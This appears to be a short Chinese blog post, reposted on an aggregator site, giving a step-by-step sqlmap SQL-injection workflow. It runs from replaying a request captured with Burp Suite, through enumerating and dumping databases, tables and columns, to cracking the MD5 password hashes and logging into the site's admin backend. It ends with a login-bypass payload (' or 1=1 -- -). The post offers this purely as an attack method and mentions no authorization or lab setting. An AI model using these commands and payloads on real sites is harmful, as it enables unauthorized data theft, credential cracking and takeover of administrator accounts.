sqlmap工具的利用

Posted 野荷

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap工具的利用相关的知识,希望对你有一定的参考价值。

sqlmap工具的利用

 

 

利用sqlmap工具进行SQLI

找到某个可以发起数据库请求页面,并确定该页面可以SQLI后,可以先用burpsuite抓 个request包

然后把包里的内容保存到文本里,例如SQLI.txt

 

sudo sqlmap -r SQLI.txt --dbs  发送request,执行注入
sudo sqlmap -r SQLI.txt --current-db  查看当前所在的数据库名称
sudo sqlmap -r SQLI.txt -D \'current db\' --tables  查看当前数据中的table
sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' --columns  选择当前数据库中的table并查看column sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' -C \'choose col1,choose col2\' --dump  选择想要查看的column并显示出来

一番操作后便可以得到用户名及由md5加密的密码

将密码解密后便可以用其登录网站管理后台了

 

简单的SQL注入

在一些admin登录界面可以试试,like this:

 

 

 

输入:
Username:admin
Password:\' or 1=1 -- -

即可登录

以上是关于sqlmap工具的利用的主要内容,如果未能解决你的问题,请参考以下文章

THMSQLMAP(Sqlmap工具使用简介)-学习

sql注入工具之 sqlmap的基本使用

KALI下Sqlmap工具使用方法:

SQLMap的前世今生(Part1)

利用Host Header来查找SQL注入,使用sqlmap篡改脚本绕过网站黑名单规则

Sqlmap